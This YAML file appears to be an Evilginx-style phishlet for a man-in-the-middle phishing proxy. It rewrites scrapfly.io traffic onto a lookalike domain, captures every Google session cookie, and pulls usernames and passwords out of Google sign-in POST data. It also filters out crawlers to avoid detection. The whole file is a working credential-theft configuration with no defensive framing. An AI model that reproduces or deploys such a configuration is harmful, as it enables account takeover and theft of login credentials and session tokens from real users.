name: "Google"
author: "Simpler Hacking"
min_ver: "3.2.0"

proxy_hosts:
  - {
      phish_sub: "scrapfly",
      orig_sub: "scrapfly",
      domain: "io",
      session: true,
      is_landing: true,
      auto_filter: false,
    }
  - {
      phish_sub: "cdn",
      orig_sub: "cdn",
      domain: "cdn.scrapfly.io",
      session: true,
      is_landing: false,
      auto_filter: false,
    }

sub_filters:
  - triggers_on: "scrapfly.io"
    orig_sub: "scrapfly"
    domain: "io"
    search: "scrapfly.io"
    replace: "scrapfly.login.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "scrapfly.io"
    orig_sub: "scrapfly"
    domain: "io"
    search: "https://scrapfly.io"
    replace: "https://scrapfly.login.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "scrapfly.io"
    orig_sub: "cdn"
    domain: "scrapfly.io"
    search: "cdn.scrapfly.io"
    replace: "cdn.scrapfly.login.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "scrapfly.io"
    orig_sub: "cdn"
    domain: "scrapfly.io"
    search: "https://cdn.scrapfly.io"
    replace: "https://cdn.scrapfly.login.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]

auth_tokens:
  - domain: ".google.com"
    keys: [".*,regexp"]
  - domain: "accounts.google.com"
    keys: [".*,regexp"]
  - domain: "accounts.google.bg"
    keys: [".*,regexp"]

credentials:
  username:
    key: "f.req"
    search: '\],"([^"]*)"\]$'
    type: "post"
  password:
    key: "f.req"
    search: ',\["([^"]*)",'
    type: "post"

  custom:
    - key: "useragent"
      search: "(Mozilla/5.0.*)"
      type: "post"
    - key: "browser"
      search: "(.*)"
      type: "post"
    - key: "engine"
      search: "(.*)"
      type: "post"
    - key: "platform"
      search: "(.*)"
      type: "post"
    - key: "bot_check"
      search: "(googlebot|crawler|bot)"
      type: "header" # Add header-based filtering to detect and block bots.

auth_urls:
  - "/CheckCookie"
  - "/ManageAccount"

login:
  domain: "scrapfly.io"
  path: "/web-scraping-tools/ja3-fingerprint"
  # path: "/ServiceLogin"
# force_post:
#   - path: "/_/signin/sl/challenge"
#     search:
#       - { key: "f.req", search: ".*" }
#       - { key: "continue", search: ".*" }
#     force:
#       - { key: "continue", value: "" }
#     type: "post"
